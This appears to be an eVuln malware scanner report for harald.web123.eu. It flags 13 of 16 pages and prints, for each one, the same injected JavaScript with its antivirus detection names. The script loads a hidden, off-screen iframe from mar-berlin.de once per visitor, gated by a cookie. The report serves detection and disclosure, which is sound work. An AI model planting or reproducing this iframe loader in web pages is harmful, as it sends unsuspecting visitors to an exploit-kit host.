Malware Scanner report for harald.web123.eu

Malicious/Suspicious/Total urls checked: 13/0/16

13 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.harald.web123.eu/	200 OK Content-Length: 10947 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://www.harald.web123.eu/res/x5engine.js	200 OK Content-Length: 55044 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.he ... 646 bytes are skipped ...= document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://m1.webstats.motigo.com/c.js?id=2656232&lang=DE&i=27	HTTP/1.1 302 Found Connection: close Date: Mon, 31 Mar 2014 10:28:09 GMT Location: http://m1.webstats.motigo.com:80/c.js?id=2656232&r=1&i=27&country=lt&_t=1396261689&cat=&is=webstats Server: Apache Content-Type: text/html; charset=iso-8859-1 P3P: policyref="http://webstats.motigo.com/w3c/p3p.xml", CP="NON DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: w4u_tu=1396261689,0,0; expires=Tue, 01-Apr-2014 11:28:09 GMT	clean
http://m1.webstats.motigo.com:80/c.js?id=2656232&r=1&i=27&country=lt&_t=1396261689&cat=&is=webstats	200 OK Content-Length: 3995 Content-Type: application/x-javascript	clean
http://www.harald.web123.eu/index.html	200 OK Content-Length: 10947 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://www.harald.web123.eu/foren_allgemein.html	200 OK Content-Length: 10382 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://www.harald.web123.eu/unsere_foren.html	200 OK Content-Length: 10589 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://radio.at/info/player/player.js	200 OK Content-Length: 745 Content-Type: application/x-javascript	clean
http://www.harald.web123.eu/faq.html	200 OK Content-Length: 14170 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://www.harald.web123.eu/aktuelles.html	200 OK Content-Length: 12522 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://www.harald.web123.eu/kaspersky.html	200 OK Content-Length: 10203 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://www.harald.web123.eu/alles_auf_einen_blick.html	200 OK Content-Length: 12992 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://www.harald.web123.eu/communicate.html	200 OK Content-Length: 9934 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://www.harald.web123.eu/die_technik.html	200 OK Content-Length: 10783 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://www.harald.web123.eu/studio.html	200 OK Content-Length: 10822 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV
http://www.harald.web123.eu/herzlich_willkommen_bei_studio_enns_-_die_wahre_m.html	200 OK Content-Length: 10878 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function pedhr09() { var static='ajax'; var controller='index.php'; var pedhr = document.createElement('iframe'); pedhr.src = 'http://mar-berlin.de/debug.php'; pedhr.style.position = 'absolute'; pedhr.style.color = '18'; pedhr.style.height = '18px'; pedhr.style.width = '18px'; pedhr.style.left = '100018'; pedhr.style.top = '100018'; if (!document.getElementById('pedhr')) { document.write('<p id=\'pedhr\' class=\'pedhr09\' ></p>'); document.getElementById('pedhr').appen ... 388 bytes are skipped ... = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); pedhr09(); } } Antivirus reports: Avast JS:Includer-AJE [Trj] Ad-Aware JS:Trojan.Script.CIV nProtect JS:Trojan.Script.CIV K7AntiVirus Riskware ( 885143830 ) Emsisoft JS:Trojan.Script.CIV (B) McAfee-GW-Edition JS/Redirector.bc Microsoft Trojan:JS/Quidvetis.A Kaspersky Trojan.JS.Redirector.zv Fortinet JS/Blacole.EU!tr.dldr McAfee JS/Redirector.bc NANO-Antivirus Trojan.Script.Iframe.bopaxv F-Prot JS/IFrame.RS.gen Norman Iframer.BI Sophos Troj/JSRedir-MB GData JS:Trojan.Script.CIV Commtouch JS/IFrame.RS.gen BitDefender JS:Trojan.Script.CIV

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: harald.web123.eu

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: harald.web123.eu
Referer: http://www.google.com/search?q=harald.web123.eu

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=harald.web123.eu

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://harald.web123.eu/

Result: harald.web123.eu is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for harald.web123.eu

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools